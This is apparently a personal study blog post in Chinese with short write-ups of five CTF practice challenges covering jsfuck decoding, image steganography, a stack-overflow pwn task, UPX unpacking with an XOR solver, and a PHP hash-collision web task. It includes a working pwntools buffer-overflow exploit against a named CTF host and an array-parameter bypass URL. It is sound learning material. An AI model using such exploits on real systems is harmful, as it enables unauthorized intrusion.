2.20学习

crypto

buu-这是什么

下载附件后打开看到是apk文件,试试直接用记事本打开,看到乱码以外,还有一堆有规律的符号,了解后发现是jsfuck编码,搜索在线工具解码就行

misc

buu-[BJDCTF2020]藏藏藏

下载附件,得到的是一个图片,没有信息,应该为图片隐写在虚拟机binwalk一下可以看到有一个zip,进行foremost提取,得到一个zip文件和一个图片,我们解压zip文件,得到一个文档,是二维码,将二维码另存为图片扫描一下,得到flag

pwn

buu-jarvisoj_level0

下载附件,checksec文件,没有保护机制64位,用ida64打开在main函数,点击f5反编译,看到了function双击查看在function函数中看到了read函数,这里存在栈溢出

然后找到callsystem,返回地址为0x400596编写exp(这里的偏移量为什么是0x88还未明白,待后续)

复制代码
from pwn import*
r=remote('node5.buuoj.cn',27608)
r.sendline(b'a'*(0x88)+p64(0x400596))
r.interactive()

re

nss-[SWPUCTF 2022 新生赛]upx

下载附件解压后查壳,64位,upx的壳

进行upx脱壳,进入含有upx.exe的文件夹,然后输入命令去壳成功后得到的是No packed然后用ida64打开这个文件,找到main函数,点击f5进行反编译根据这段关键的代码,就是将输入的字符串v6遍历,每一个与2进行异或后与v4比对,相同就说明输入的是flag。

逆向写代码,将v4与2异或得到的就是v6

复制代码
a='LQQAVDyWRZ]3q]zmpf]uc{]vm]glap{rv]dnce'
flag=''
for i in range(len(a)):
    flag+=chr(ord(a[i])^2)
print(flag)

web

bugku-前女友

打开环境后看到了一段文字,没有我们需要的什么信息,也没有看到任何按钮,但是注意到说的"链接",这个链接勾起了"php是世界上最好的语言"的回忆,所以这个链接应该是在页面中的,且是php代码,点击f12查看源代码,展开后可以看到有一个地方(在'一个'与'链接'的中间有其他信息),所以我们试着在这里点击试试成功得到一个链接这里用到我们之前学过的哈希碰撞,就得到flag

http://117.72.52.127:13324/?v1[]=1&v2[]=2&v3[]=1

相关推荐
一只码代码的章鱼1 小时前
学习笔记(算法学习+Maven)
笔记·学习·算法
冰茶_1 小时前
WPF TextBlock控件性能优化指南
学习·性能优化·wpf·控件
keep intensify2 小时前
数据结构---单链表的增删查改
c语言·数据结构·c++·经验分享·学习·算法·分享
2501_915373882 小时前
怎样学习Electron
javascript·学习·electron
怀念无所不能的你3 小时前
acwing背包问题求方案数
学习·算法·动态规划·dp
LVerrrr3 小时前
Missashe考研日记-day29
学习·考研
灏瀚星空3 小时前
从基础到实战的量化交易全流程学习:1.3 数学与统计学基础——线性代数与矩阵运算 | 矩阵基础
笔记·python·学习·线性代数·数学建模·金融·矩阵
qq_162911594 小时前
tigase源码学习杂记-IO处理的线程模型
java·学习·源码·xmpp·tigase·多线程io模型
viperrrrrrrrrr74 小时前
大数据学习(115)-hive与impala
大数据·hive·学习·impala
名字不要太长 像我这样就好10 小时前
【iOS】OC源码阅读——alloc源码分析
笔记·学习·macos·ios·objective-c